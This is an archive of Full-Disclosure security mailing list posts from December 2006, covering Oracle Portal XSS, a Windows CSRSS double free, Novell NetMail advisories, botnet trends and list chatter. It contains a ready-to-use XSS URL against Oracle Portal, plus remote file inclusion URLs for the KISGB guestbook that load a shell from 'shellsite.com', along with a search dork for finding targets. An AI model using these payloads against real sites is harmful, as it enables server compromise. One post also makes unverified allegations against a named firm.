>vulnerable to XSS via UTF-7 as well.
>
>Regards,
>Brian

Yeah, it is.

_________________________________________________________________
Moda para esta temporada. Ponte al d?a de todas las tendencias. 
http://www.msn.es/Mujer/moda/default.asp



From hasecorp at hotmail.com  Fri Dec 22 08:30:42 2006
From: hasecorp at hotmail.com (putosoft softputo)
Date: Fri, 22 Dec 2006 08:30:42 +0000
Subject: [Full-disclosure] Oracle Applications/Portal 9i/10g Cross Site
	Scripting
Message-ID: 

Description
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the 
Oracle Portal. The following is one that you may found in any version:

http:///webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');//

The following code will be generated:

---SNIPPED---

---SNIPPED---

Solution
------------

There is no solution. As a workaround, enable mod_security if it's not. 
Otherwise wait 6 months/1 year for a patch from Oracle Corp.

_________________________________________________________________
Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con 
MSN Entretenimiento. http://entretenimiento.msn.es/



From 3APA3A at SECURITY.NNOV.RU  Fri Dec 22 12:31:33 2006
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Fri, 22 Dec 2006 15:31:33 +0300
Subject: [Full-disclosure] Microsoft Windows XP/2003/Vista memory
	corruption 0day
In-Reply-To: <458AEA71.6060207@determina.com>
References: <1627317058.20061221145817@SECURITY.NNOV.RU>
	<978639475.20061221164141@SECURITY.NNOV.RU>
	<458AEA71.6060207@determina.com>
Message-ID: <1488887633.20061222153133@SECURITY.NNOV.RU>

Dear Alexander Sotirov,


AS> The  HardError  message  is handled by the UserHardError function in
AS> WINSRV.DLL. It calls GetHardErrorText to read the message parameters
AS> from  the address space of the sender. The GetHardErrorText function
AS> returns  pointers to the caption and text of the message box. If the
AS> caption  or text parameters start with the \??\ prefix, the function
AS> inexplicably frees the buffer and returns a pointer to freed memory.
AS> After  the  message  box  is  closed by the user, the same buffer is
AS> freed  again  in  the  FreePhi  function, resulting in a double free
AS> vulnerability.

I  may  be  wrong, but probably this fact doesn't explain the garbage on
the  screen in MessageBox. Even "use after free()" vulnerability doesn't
explain  it, because garbage is permanent. There should be some more bug
before second free().


--Thursday, December 21, 2006, 11:11:29 PM, you wrote to 3APA3A at SECURITY.NNOV.RU:

AS> 3APA3A wrote:
>> Killer{R}  assumes  the problem is in strcpy(), because it should not be
>> used for overlapping buffers, but at least ANSI implementation of strcpy
>> from  Visual  C  should be safe in this very situation (copying to lower
>> addresses).  May be code is different for Windows XP or vulnerability is
>> later in code.

AS> We discovered this bug some time ago and were preparing an advisory when it was
AS> publicly disclosed. Since the exploit is already public, here's my analysis of
AS> the vulnerability:

AS> http://www.determina.com/security.research/vulnerabilities/csrss-harderror.html

AS> It's a double free bug that leads to arbitrary code execution in the CSRSS process.

AS> Alex


-- 
~/ZARAZA
????????? ??????????! ??? ?? ??? ?????????? ?????.  (????)



From angray at beeb.net  Fri Dec 22 13:46:52 2006
From: angray at beeb.net (Aaron Gray)
Date: Fri, 22 Dec 2006 13:46:52 -0000
Subject: [Full-disclosure] Windows is very holy
References: 
	<113301c72555$f23620f0$0200a8c0@AMD2500>
	<200612220003.kBM03DRF003198@turing-police.cc.vt.edu>
Message-ID: <001d01c725cf$a3972c80$0200a8c0@AMD2500>

Its all greek to me :)

Aaron



From angray at beeb.net  Fri Dec 22 13:50:02 2006
From: angray at beeb.net (Aaron Gray)
Date: Fri, 22 Dec 2006 13:50:02 -0000
Subject: [Full-disclosure] Windows is very holy
References: <1166751473.15192.0.camel@localhost>
	<1166752444.15192.13.camel@localhost>
Message-ID: <002401c725d0$1422f8d0$0200a8c0@AMD2500>

> On Thu, 2006-12-21 at 20:37 -0500, Jim Popovitch wrote:
>> On Thu, 2006-12-21 at 02:28 +0000, Aaron Gray wrote:
>> > Windows is very very holy.
>>
>> Don't you mean hole'y?  ;-)

Probably.

> OK, why do I get bounce messages from

I silly enought to have originally posted this post to N3TD3V's Google List. 
He is forwarding to FD and other security lists that are bouncing.

Sorry,

Aaron



From angray at beeb.net  Fri Dec 22 15:29:27 2006
From: angray at beeb.net (Aaron Gray)
Date: Fri, 22 Dec 2006 15:29:27 -0000
Subject: [Full-disclosure] Test Posting
Message-ID: <003001c725dd$f7cd8570$0200a8c0@AMD2500>

I think N3TD3V is posting to new mailing lists and groups between FD and NETDEV google group and those extra postings are bouncing. Not totally sure but this is a test.

Aaron
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061222/161b0a4a/attachment.html 

From asotirov at determina.com  Fri Dec 22 18:20:25 2006
From: asotirov at determina.com (Alexander Sotirov)
Date: Fri, 22 Dec 2006 10:20:25 -0800
Subject: [Full-disclosure] Microsoft Windows XP/2003/Vista memory
 corruption 0day
In-Reply-To: <1488887633.20061222153133@SECURITY.NNOV.RU>
References: <1627317058.20061221145817@SECURITY.NNOV.RU>
	<978639475.20061221164141@SECURITY.NNOV.RU>
	<458AEA71.6060207@determina.com>
	<1488887633.20061222153133@SECURITY.NNOV.RU>
Message-ID: <458C21E9.3080605@determina.com>

3APA3A wrote:
> AS> The  HardError  message  is handled by the UserHardError function in
> AS> WINSRV.DLL. It calls GetHardErrorText to read the message parameters
> AS> from  the address space of the sender. The GetHardErrorText function
> AS> returns  pointers to the caption and text of the message box. If the
> AS> caption  or text parameters start with the \??\ prefix, the function
> AS> inexplicably frees the buffer and returns a pointer to freed memory.
> AS> After  the  message  box  is  closed by the user, the same buffer is
> AS> freed  again  in  the  FreePhi  function, resulting in a double free
> AS> vulnerability.
> 
> I  may  be  wrong, but probably this fact doesn't explain the garbage on
> the  screen in MessageBox. Even "use after free()" vulnerability doesn't
> explain  it, because garbage is permanent. There should be some more bug
> before second free().

The buffer that contains the caption and text of the message box is freed before
the message box is displayed. The freed memory is allocated again and
overwritten with other data. Displaying this other data as a unicode string
results in garbage in the message box.

Alex



From dinis at ddplus.net  Fri Dec 22 11:21:43 2006
From: dinis at ddplus.net (Dinis Cruz)
Date: Fri, 22 Dec 2006 11:21:43 +0000
Subject: [Full-disclosure] [WEB SECURITY] Re: comparing information
	security to other industries
In-Reply-To: <6.0.1.1.2.20061219191355.057f6eb0@mail.mindtheater.net>
References: 
	<6.0.1.1.2.20061219191355.057f6eb0@mail.mindtheater.net>
Message-ID: <701fd6b60612220321o427d3a62k61e07a18d897dfc0@mail.gmail.com>

The problem here is an economic one, unfortunately it seems that we will
have to wait for the cost of exploitation of digital (from web sites down)
assets is bigger than the money made by those 'insecure' applications.

So far, in general, the business model of the attackers has not evolved
beyond basic/simple exploits (the ones that have evolved are not significant
and probably make enough money without leving much trace).

Dinis Cruz
Chief OWASP Evangelist
http://www.owasp.org

On 12/20/06, Nancy Kramer  wrote:
>
> At 03:16 PM 12/19/2006, KT wrote:
> >What I am trying to figure out is how mature we are and how long will it
> >take for to get stable?
>
>
> Not very mature and it will take a long time to get stable because
> programmers are just beginning to be aware of application security
> requirements and then they need to figure out how to implement
> them.  Remember most programmers came from a client server or mainframe
> world and they "don't get it".  The consumer also doesn't "get it".  They
> work great together.
>
> I went to a PHP Conference recently and the creator of PHP said that there
> is not such thing as a completely secure web application.  When failure is
> a goal you will definitely get there.
>
> I know all this because I am a programmer by background.  Most people
> designing web applications know so little about security it is scary.
>
> Regards,
>
> Nancy Kramer
> Webmaster http://www.americandreamcars.com
> Free Color Picture Ads for Collector Cars
> One of the Ten Best Places To Buy or Sell a Collector Car on the Web
>
>
>
> --
> No virus found in this outgoing message.
> Checked by AVG Free Edition.
> Version: 7.1.409 / Virus Database: 268.15.23/591 - Release Date:
> 12/17/2006
>
>
>
>
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>


--
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061222/1dc31805/attachment.html 

From 3APA3A at SECURITY.NNOV.RU  Fri Dec 22 21:00:06 2006
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Sat, 23 Dec 2006 00:00:06 +0300
Subject: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB
In-Reply-To: <558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>
References: <558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>
Message-ID: <1084341919.20061223000006@SECURITY.NNOV.RU>

Dear 0o_zeus_o0 elitemexico.org,

 Thanks, published. http://www.security.nnov.ru/source13365.html

--Friday, December 22, 2006, 11:55:17 PM, you wrote to bugtraq at zone-h.org:

0eo> ###########################################################################
0eo> # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
0eo> #
0eo> # Author: 0o_zeus_o0 ( Arturo Z. )
0eo> # Contact: zeus at diosdelared.com
0eo> # Website: www.diosdelared.com
0eo> # Date: 22/12/06
0eo> # Risk: critical
0eo> # Vendor Url: http://sourceforge.net/projects/kisgb,
0eo> http://ravenphpscripts.com
0eo> # Affected Software: Keep It Simple Guest Book
0eo> # search: inurl:kisgb , intitle:KISGB
0eo> #
0eo> #Info:
0eo> ##################################################################
0eo> #Bug is risky by since it is possible to be included I cosay malisioso
0eo> #that allows to see or to modify the archives
0eo> #code:
0eo> #if (isset($default_path_for_themes))
0eo> require("$default_path_for_themes/$theme");
0eo> #else require("$path_to_themes/$theme");
0eo> ##################################################################
0eo> #
0eo> #
0eo> #http://site/path/gbpath/authenticate.php?path_to_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/admin.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/upconfig.php?default_path_for_themes=
0eo> http://shellsite.com/php.gif?
0eo> ##################################################################
0eo> #VULNERABLE VERSIONS
0eo> ##################################################################
0eo> # 5.0.0
0eo> #
0eo> ##################################################################
0eo> #Contact information
0eo> #0o_zeus_o0
0eo> #zeus at diosdelared.com
0eo> #www.diosdelared.com
0eo> ##################################################################
0eo> #greetz: S.S.M, sams, a mi beba
0eo> #Original Advisory: http://diosdelared.com/15.txt
0eo> ##################################################################


-- 
~/ZARAZA
??????? ?? ?????? ???, ?? ????????? ????????????. ??????????? ??? ?. (????)



From exposeyourass at hush.ai  Fri Dec 22 20:52:31 2006
From: exposeyourass at hush.ai (exposeyourass at hush.ai)
Date: Fri, 22 Dec 2006 15:52:31 -0500
Subject: [Full-disclosure] Sacure Enterprise Security - A Farce
Message-ID: <20061222205232.45E98DA81F@mailserver7.hushmail.com>

List, 
     I am the Director of I.T. for a business located near 
Manhattan NY. I am going to keep this post anonymous because I was 
"strongly advised" to "let things slide".  But never the less, I 
need to ask others about this "company" called Sacure and this 
person named  Jeff.

    A while back Jeff who apparently owns the Enterprise Security 
company called "Sacure"  mentioned a few things that struck me as 
hogwash. The first was when he told me that he had a particular 
employee on his team that was souly responsible for the 
Tru64/HP/DMCA fiasco.  My first impression was to think that his 
company had some skill under their belt, but when I asked if I 
could meet this "person" he evaded the question... and needless to 
say I never met anyone. 

    So I decided to google a bit. In the process of googling I 
learned that there was no single person responsible for the HP 
incident. Instead, i learned that the entire ordeal revolved around 
this group called SNOsoft.  I took the liberty of contacting one of 
the SNOsoft people (who will also remain anonymous) and I found 
that they knew who Jeff was but never worked with him.  Now that 
struck me as odd seeing as Jeff told me that at the time he was 
working with this "person". 

Jeff flat out lied to my face...  and that wasn't the only time. In 
fact, with a bit of research I was able to determine that nearly 
all the stories he'd fed to me were lies...  but we won't go into 
the rest of them here because I'd be writing for ever. 

 I did take a bit more time to look at the sacure website and found 
that other things didn't add up, like their customer portal which 
appears to be fake and their live help that is never answered by a 
human being.  Are they even a real company?!?!

    Has anyone ever work with Sacure (http://www.sacure.com) or has 
anyone ever met this Jeff person? Is his name even Jeff?
    



  



     





Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485



From str0ke at milw0rm.com  Fri Dec 22 22:08:41 2006
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 22 Dec 2006 16:08:41 -0600
Subject: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB
In-Reply-To: <558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>
References: <558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>
Message-ID: <814b9d50612221408id0e1411na9b1936bf4e06bdf@mail.gmail.com>

Dear 0o_zeus_o0 elitemexico.org,

 Thanks, this won't be going up since this was posted on milw0rm today
around 4-6 hours ago for the original author mdx.

http://www.milw0rm.com/exploits/2979.

The only affected script is authenticate.php with the
default_path_for_themes variable.  The rest of them just
include/require the vulnerable script.

/str0ke

On 12/22/06, 0o_zeus_o0 elitemexico.org  wrote:
> ###########################################################################
> # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
> #
> # Author: 0o_zeus_o0 ( Arturo Z. )
> # Contact: zeus at diosdelared.com
> # Website: www.diosdelared.com
> # Date: 22/12/06
> # Risk: critical
> # Vendor Url: http://sourceforge.net/projects/kisgb ,
> http://ravenphpscripts.com
> # Affected Software: Keep It Simple Guest Book
> # search: inurl:kisgb , intitle:KISGB
> #
> #Info:
> ##################################################################
> #Bug is risky by since it is possible to be included I cosay malisioso
> #that allows to see or to modify the archives
> #code:
> #if (isset($default_path_for_themes))
> require("$default_path_for_themes/$theme");
> #else require("$path_to_themes/$theme");
> ##################################################################
> #
> #
> #http://site/path/gbpath/authenticate.php?path_to_themes=
> http://shellsite.com/php.gif?
> #
> #http://site/path/gbpath/admin.php?default_path_for_themes=http://shellsite.com/php.gif?
> #
> #http://site/path/gbpath/upconfig.php?default_path_for_themes=
> http://shellsite.com/php.gif?
> ##################################################################
> #VULNERABLE VERSIONS
> ##################################################################
> # 5.0.0
> #
> ##################################################################
> #Contact information
> #0o_zeus_o0
> #zeus at diosdelared.com
> #www.diosdelared.com
> ##################################################################
> #greetz: S.S.M, sams, a mi beba
> #Original Advisory: http://diosdelared.com/15.txt
> ##################################################################



From zdi-disclosures at 3com.com  Sat Dec 23 00:11:16 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Fri, 22 Dec 2006 16:11:16 -0800
Subject: [Full-disclosure] ZDI-06-052: Novell NetMail NMAP STOR Buffer
	Overflow Vulnerability
Message-ID: 

ZDI-06-052: Novell NetMail NMAP STOR Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-052.html
December 22, 2006

-- CVE ID:
CVE-2006-6424

-- Affected Vendor:
Novell

-- Affected Products:
Novell NetMail 3.5.2

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since September 14, 2006 by Digital Vaccine protection
filter ID 3902. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
affected installations of Novell NetMail. Successful exploitation
requires the attacker to successfully authenticate to the affected
service.

The specific flaw exists in NetMail's implementation of the Network
Messaging Application Protocol (NMAP). The NMAP server lacks bounds
checking on parameters supplied to the STOR command, which can lead to
an exploitable buffer overflow. The vulnerable daemon, nmapd.exe, binds
to TCP port 689.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details
can be found at:

 
http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public

-- Disclosure Timeline:
2006.09.08 - Vulnerability reported to vendor
2006.09.14 - Digital Vaccine released to TippingPoint customers
2006.12.22 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Dennis Rand - CIRT.DK.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.



From zdi-disclosures at 3com.com  Sat Dec 23 00:11:44 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Fri, 22 Dec 2006 16:11:44 -0800
Subject: [Full-disclosure] ZDI-06-054: Novell NetMail IMAP APPEND Buffer
	Overflow Vulnerability
Message-ID: 

ZDI-06-054: Novell NetMail IMAP APPEND Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-054.html
December 22, 2006

-- CVE ID:
CVE-2006-6425

-- Affected Vendor:
Novell

-- Affected Products:
Novell NetMail 3.5.2

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since December 21, 2006 by Digital Vaccine protection
filter ID 3868. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
affected installations of Novell NetMail. Successful exploitation
requires the attacker to successfully authenticate to the affected
service.

The specific flaw exists in the NetMail IMAP server's handling of the
APPEND command. A lack of bounds checking on a specific parameter to
this command can lead to a stack-based buffer overflow. This
vulnerability can be exploited to execute arbitrary code.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details
can be found at:

 
http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public

-- Disclosure Timeline:
2006.08.14 - Vulnerability reported to vendor
2006.12.21 - Digital Vaccine released to TippingPoint customers
2006.12.22 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.



From zdi-disclosures at 3com.com  Sat Dec 23 00:11:32 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Fri, 22 Dec 2006 16:11:32 -0800
Subject: [Full-disclosure] ZDI-06-053: Novell NetMail IMAP Verb Literal Heap
	Overflow Vulnerability
Message-ID: 

ZDI-06-053: Novell NetMail IMAP Verb Literal Heap Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-053.html
December 22, 2006

-- CVE ID:
CVE-2006-6424

-- Affected Vendor:
Novell

-- Affected Products:
Novell NetMail 3.5.2

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since December 21, 2006 by Digital Vaccine protection
filter ID 4543. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
affected versions of Novell NetMail. Authentication is not required to
exploit this vulnerability.

The specific flaw exists in the NetMail IMAP service, imapd.exe. The
service does not sufficiently validate user-input length values when
literals are appended to IMAP verbs to specify a command continuation
request. The memory allocated to store the additional data may be
insufficient, leading to an exploitable heap-based buffer overflow.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details
can be found at:

 
http://www.novell.com/support/search.do?cmd=displayKC&externalId=3096026&sliceId=SAL_Public

-- Disclosure Timeline:
2006.08.14 - Vulnerability reported to vendor
2006.12.21 - Digital Vaccine released to TippingPoint customers
2006.12.22 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.



From ge at linuxbox.org  Sat Dec 23 03:59:28 2006
From: ge at linuxbox.org (Gadi Evron)
Date: Fri, 22 Dec 2006 21:59:28 -0600 (CST)
Subject: [Full-disclosure] Botnets: a retrospective to 2006,
	and where we are headed in 2007
Message-ID: 

A few months back I released a post on where I think anti-botnets
technology is heading ( http://blogs.securiteam.com/index.php/archives/697 ).
Now it's time for what happened in 2006, and what we can expect from here
on.

I am not a strong believer in such retrospective looks, as often, they are
completely biased and based on what we have seen and what we want to
see. This is why I will try and limit myself to what we know happens and
is likely to get attention, as well as what we have seen tried by bad
guys, which is working for them enough to take to the next level.

What changed with botnets in 2006:
1.Botnets reached a level where it is unclear today what parts of the
Internet are not compromised to an extent. Count by clean rather than
infected.
2. Botnets have become the most significant platform from which virtually
any type of online attack and crime are launched. Botnets equal an online
infrastructure for abusive or criminal activity online.
3. In the past year, botnets have become mainstream. From a not existent
field even in the professional realm up to a few years ago, where attacks
were happening constantly reagrdless, it has turned to the main buzzword
and occupation of the security industry today, directly and indirectly.
4. Websites have returned to being one the most significant form of
infection for building botnets, which hadn't been the case since the late
90s.
5. Botnets have become the moving force behind organized crime online,
with a low-risk high-profit calculation.
6. New technologies are finally being introduced, moving the botnet
controllers from using just (or mainly) IRC to more advanced C&C (command
and control) channels such as P2P, or multi-layered, such as DNS and IRC
on the OSI model.
7. Botnets used to be a game of quantity. Today, when quantity is assured,
quality is becoming a high concern for botnet controllers, both in type of
bot as well as in abilities.

What's going to happen with botnets in 2007:

Botnets won't change. All will remain the same as it has been for
years. Awareness however, will increase making the problem appear larger
and larger, perhaps approaching its real scale. The bad guys would utilize
their infrastructure to get more out of the bots (quality once quantity is
here) and be able to do more than just steal cash. Maximizing their
revenue.

Further, more and more attackers unrelated to the botnet controllers will
make use of already compromised systems and existing botnets to gain
access to networks, to facilitate anything from corporate espionage and
intelligence gathering, to shame-less and open show of strength to those
who oppose them (think Blue Security), in the real world as well as the
cyber one (which to the mob is one and the same, it's the income that
speaks).

Meaning, the existing botnets infrastructure will be utilized both in an
open fashion, due to the fact online miscreants (real-world mob) face
virtually no risk, as well as quiet and secretive uses for third-party
intelligence operations.

	Gadi Evron.



From zeus.olimpusklan at gmail.com  Fri Dec 22 20:55:17 2006
From: zeus.olimpusklan at gmail.com (0o_zeus_o0 elitemexico.org)
Date: Fri, 22 Dec 2006 21:55:17 +0100
Subject: [Full-disclosure] Multiple Remote Vulnerabilities in KISGB
Message-ID: <558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>

###########################################################################
# Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus at diosdelared.com
# Website: www.diosdelared.com
# Date: 22/12/06
# Risk: critical
# Vendor Url: http://sourceforge.net/projects/kisgb,
http://ravenphpscripts.com
# Affected Software: Keep It Simple Guest Book
# search: inurl:kisgb , intitle:KISGB
#
#Info:
##################################################################
#Bug is risky by since it is possible to be included I cosay malisioso
#that allows to see or to modify the archives
#code:
#if (isset($default_path_for_themes))
require("$default_path_for_themes/$theme");
#else require("$path_to_themes/$theme");
##################################################################
#
#
#http://site/path/gbpath/authenticate.php?path_to_themes=
http://shellsite.com/php.gif?
#
#http://site/path/gbpath/admin.php?default_path_for_themes=
http://shellsite.com/php.gif?
#
#http://site/path/gbpath/upconfig.php?default_path_for_themes=
http://shellsite.com/php.gif?
##################################################################
#VULNERABLE VERSIONS
##################################################################
# 5.0.0
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus at diosdelared.com
#www.diosdelared.com
##################################################################
#greetz: S.S.M, sams, a mi beba
#Original Advisory: http://diosdelared.com/15.txt
##################################################################
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061222/89c46d97/attachment.html 

From jhamm at lancope.com  Sat Dec 23 15:47:13 2006
From: jhamm at lancope.com (Joseph Hamm)
Date: Sat, 23 Dec 2006 10:47:13 -0500
Subject: [Full-disclosure] Full-Disclosure Digest, Vol 22, Issue 36
In-Reply-To: 
Message-ID: 

Thank you for your email!  I am out of the office on vacation until January
2, 2007. 

For customer support issues, please use support at lancope.com or call our
support line during office hours at 1-800-838-6574.

For sales inquiries, please email Mark Gothard at mgothard at lancope.com

Happy Holidays!

Kind regards,
Joe

-- 

Joe Hamm
Major Account Manager
Lancope, Inc.
jhamm at lancope.com
972-408-5586 Phone
214-614-4816 Fax

Lancope?
Optimizing Security and Network Operations?
 
www.lancope.com 


-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061223/0fdac2f6/attachment.html 

From mkmaxx at gmail.com  Sat Dec 23 17:31:15 2006
From: mkmaxx at gmail.com (Jeb Osama)
Date: Sat, 23 Dec 2006 23:01:15 +0530
Subject: [Full-disclosure] n3td3v calls on month of bug campaigns to stop
Message-ID: <44952da30612230931wd6e4eefqb13d87dbe9d5d5dc@mail.gmail.com>

>
> From: n3td3v 
>
>
> [introduction]
> n3td3v is deeply sad at the new trend of morally accepted blackmail by
> the security community, known better as a month of bugs.
>
> sincere researchers are coming forward more frequently to threaten
> companies with a month of vendor bugs.
>
> because they are known to be sincere they are morally left off the
> hook from what is known by n3td3v to be straight forward blackmail.
>
> blackmail is illegal, for this reason n3td3v wishes to make the
> following recommendations:
>
> [1]bug a day for a month campaigns are blackmail on the part of the
> researcher, all should be outlawed by government.
>
> [2]n3td3v calls on the government to make it highly illegal and
> morally unacceptable to threaten a month of bugs for a vendor and its
> customers
>
> [3]security researchers think its "fun" but all it amounts to is blackmail
>
> [4]all blackmail attempts shouldn't be dressed up as harmless fun
>
> [5]governments need to wake up and swiftly arrest those making month
> of bug claims in the future
>
> [6]corporations and its consumers shouldn't be scared mongered and
> threatened by individuals
>
> [7]researchers shouldn't use their real name or real place of
> employment and expect exclusion from legal action against blackmail
>
> [8]researchers shouldn't be allowed to profit or gain career
> opportunities by such claims to action by the researcher
>
> [9]researchers should be taken into custody, questioned and have their
> hardware obtained for forensic analysis before a month of bugs is due
> to start
>
> [10]individuals threatening to carry out a month of bugs shouldn't be
> labelled as "security researchers" by the media and security experts
>
> [11]such individuals should be clearly labelled as "criminals",
> "malicious attackers" and "blackhats", no matter what other "friendly"
> or "useful" research they've carried out in the past.
>
> [media dork reference]
> http://news.com.com/2061-10793_3-6144833.html


n3tty!!! Missed you dude!

[1] I am so happy you're back
[2] My happiness is very much
[3] same point as [1] but differently put
[4] Point that seems to be different from 1 and 3 but is not
..
..
[45] I'm soo happy!!

Where were you all these days? Whats up with the site your 'security' site??
And the list? And the yahoo world-domination plans? Geez!! so much to talk
about..

Jeb

PS : Whatever happened to Jeb Bush ? Doctors treated him?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061223/83523f46/attachment.html 

From SDALAN04 at smumn.edu  Sat Dec 23 18:39:10 2006
From: SDALAN04 at smumn.edu (SDALAN04 at smumn.edu)
Date: Sat, 23 Dec 2006 12:39:10 -0600
Subject: [Full-disclosure] n3td3v calls on month of bug campaigns to stop
Message-ID: <2006122318391018794ec5c7@mail.smumn.edu>

They had me terminate his yahoo accounts. Probably got fired!!!
  
 On Saturday, December 23, 2006 11:31 AM, Jeb Osama wrote:

Date: Sat, 23 Dec 2006 23:01:15 +0530
From: Jeb Osama
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] n3td3v calls on month of bug campaigns to stop

  

From: n3td3v  


[introduction]
n3td3v is deeply sad at the new trend of morally accepted blackmail by
the security community, known better as a month of bugs.

sincere researchers are coming forward more frequently to threaten 
companies with a month of vendor bugs.

because they are known to be sincere they are morally left off the
hook from what is known by n3td3v to be straight forward blackmail.

blackmail is illegal, for this reason n3td3v wishes to make the 
following recommendations:

[1]bug a day for a month campaigns are blackmail on the part of the
researcher, all should be outlawed by government.

[2]n3td3v calls on the government to make it highly illegal and 
morally unacceptable to threaten a month of bugs for a vendor and its
customers

[3]security researchers think its "fun" but all it amounts to is blackmail

[4]all blackmail attempts shouldn't be dressed up as harmless fun 

[5]governments need to wake up and swiftly arrest those making month
of bug claims in the future

[6]corporations and its consumers shouldn't be scared mongered and
threatened by individuals

 [7]researchers shouldn't use their real name or real place of
employment and expect exclusion from legal action against blackmail

[8]researchers shouldn't be allowed to profit or gain career
opportunities by such claims to action by the researcher 

[9]researchers should be taken into custody, questioned and have their
hardware obtained for forensic analysis before a month of bugs is due
to start

[10]individuals threatening to carry out a month of bugs shouldn't be 
labelled as "security researchers" by the media and security experts

[11]such individuals should be clearly labelled as "criminals",
"malicious attackers" and "blackhats", no matter what other "friendly" 
or "useful" research they've carried out in the past.

[media dork reference]
